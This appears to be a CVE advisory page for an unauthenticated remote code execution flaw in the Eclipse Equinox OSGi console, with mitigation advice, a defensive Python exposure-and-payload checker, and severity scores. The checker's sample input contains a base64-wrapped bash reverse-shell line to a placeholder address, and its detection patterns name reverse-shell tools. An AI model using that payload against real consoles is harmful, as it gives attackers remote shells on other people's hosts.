CVSS 9.8 · CRITICAL

CVE-2023-54344

Eclipse Equinox OSGi 3.7.2 and earlier contains a remote code execution vulnerability that allows unauthenticated attackers to execute arbitrary commands by sending payloads to the console interface. Attackers can connect to the OSGi console port and send base64-encoded bash commands wrapped in fork directives to achieve code execution and establish reverse shell connections.

View on NVD

Analysis

Eclipse Equinox OSGi 3.7.2 and earlier is vulnerable to unauthenticated remote code execution through its console interface: an attacker who can reach the console port can issue `fork` commands that run arbitrary shell commands on the host, including base64-decoded payloads that open a reverse shell. The console is enabled with the `-console` launcher option (or the `osgi.console` system property); when a port is given, for example `-console 1234`, the console listens on that TCP port with no authentication. Java developers and system administrators should verify that no Equinox console port is reachable from untrusted networks (a connection is greeted with the `osgi> ` prompt), run the console without a port or leave it disabled in production, and update to a patched version.
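A practitioner-side check for the two things this advisory turns on, whether an Equinox console is reachable over TCP and whether input sent to it carries the `fork`-plus-base64 shape described above. The script is an added example, not code from the advisory, NVD or the Equinox project. It assumes the console greets a client with the `osgi> ` prompt; the regular expressions are our own heuristics and the sample lines are constructed, not captured from a real incident.

```python
"""Exposure and payload-shape checks for the Equinox OSGi console.

Added example, not code from the advisory or the Equinox project.
Assumptions: the console prints the prompt "osgi> " on connect, and
attacker input arrives as `fork <command>` lines that may carry a
base64 blob. Regexes and sample input below are constructed here."""
import base64
import binascii
import re
import socket

# Prompt the Equinox console prints (assumption: Equinox's documented prompt).
OSGI_PROMPT = b"osgi> "

# `fork` is the legacy Equinox console command that runs a native process.
FORK_RE = re.compile(r"^\s*fork(?:\s+(?P<cmd>.*))?$", re.IGNORECASE)
# Heuristic shell / decoder indicators inside the forked command (our choice).
SHELL_RE = re.compile(r"(\bbase64\s+(-d|--decode)\b|\bbash\s+-c\b|/bin/(ba)?sh\b)", re.IGNORECASE)
# Heuristic reverse-shell indicators, applied to the literal command and to
# whatever its base64 tokens decode to.
REVSHELL_RE = re.compile(r"(/dev/tcp/|\bnc\b[^|]*\s-e\b|\bncat\b|\bsocat\b|\bmkfifo\b)", re.IGNORECASE)
B64_TOKEN_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def decode_base64_tokens(text):
    """Decode every base64-looking token in text; tokens that fail validation are skipped."""
    decoded = []
    for tok in B64_TOKEN_RE.findall(text):
        try:
            decoded.append(base64.b64decode(tok, validate=True).decode("utf-8", "replace"))
        except (binascii.Error, ValueError):
            continue
    return decoded


def classify_console_line(line):
    """Classify one line of console input: 'benign', 'fork', 'fork-shell' or 'fork-revshell'."""
    m = FORK_RE.match(line)
    if not m:
        return "benign"
    cmd = m.group("cmd") or ""
    # Inspect the literal command plus the plaintext hidden in any base64 token.
    views = [cmd] + decode_base64_tokens(cmd)
    if any(REVSHELL_RE.search(v) for v in views):
        return "fork-revshell"
    if any(SHELL_RE.search(v) for v in views):
        return "fork-shell"
    return "fork"


def flag_stream(lines):
    """Return (line, verdict) pairs for every non-benign line in a console input stream."""
    flagged = []
    for line in lines:
        verdict = classify_console_line(line)
        if verdict != "benign":
            flagged.append((line, verdict))
    return flagged


def looks_like_osgi_console(banner):
    """True if the bytes read after connecting contain the Equinox console prompt."""
    return OSGI_PROMPT in banner


def probe_console(host, port, timeout=3.0):
    """Connect to host:port, read the greeting and report whether it is an
    Equinox console. Sends only a newline, which the console treats as an
    empty command, so this is safe against your own hosts."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.settimeout(timeout)
        sock.sendall(b"\n")
        try:
            banner = sock.recv(1024)
        except socket.timeout:
            banner = b""
    return looks_like_osgi_console(banner)


# Constructed sample of lines sent to the console port, as they might be
# reassembled from a capture of the console TCP stream. The encoded blob is a
# generic bash reverse shell to an RFC 5737 documentation address; it exists
# only as decoder input and is never executed by this script.
_BLOB = base64.b64encode(b"bash -i >& /dev/tcp/192.0.2.10/4444 0>&1").decode()
SAMPLE_LINES = [
    "ss",                # legitimate console command (short bundle status)
    "bundles",
    "fork ls -la /tmp",  # native command with no shell indicator
    f'fork bash -c "echo {_BLOB} | base64 -d | bash"',
    "fork /bin/sh -c id",
]

if __name__ == "__main__":
    for line, verdict in flag_stream(SAMPLE_LINES):
        print(f"{verdict:14s} {line}")
```

Run as-is it classifies the constructed sample; only `probe_console()` touches the network. Treat the banner check as the higher-signal control: the `fork` pattern is trivially varied by an attacker, whereas an `osgi> ` prompt answering on a listening port is the exposure itself.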

Severity

Score: 9.8 (CRITICAL)
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
AV: NETWORK
AC: LOW
PR: NONE
UI: NONE
S: UNCHANGED
C: HIGH
I: HIGH
A: HIGH
Weakness type (CWE): CWE-306

EPSS

Probability of exploitation (next 30 days): 0.0015 (0.2%)
Percentile: 35.3%
EPSS date: 2026-05-06

Published: 5/5/2026, 12:16:16
Last modified: 5/5/2026, 19:47:31
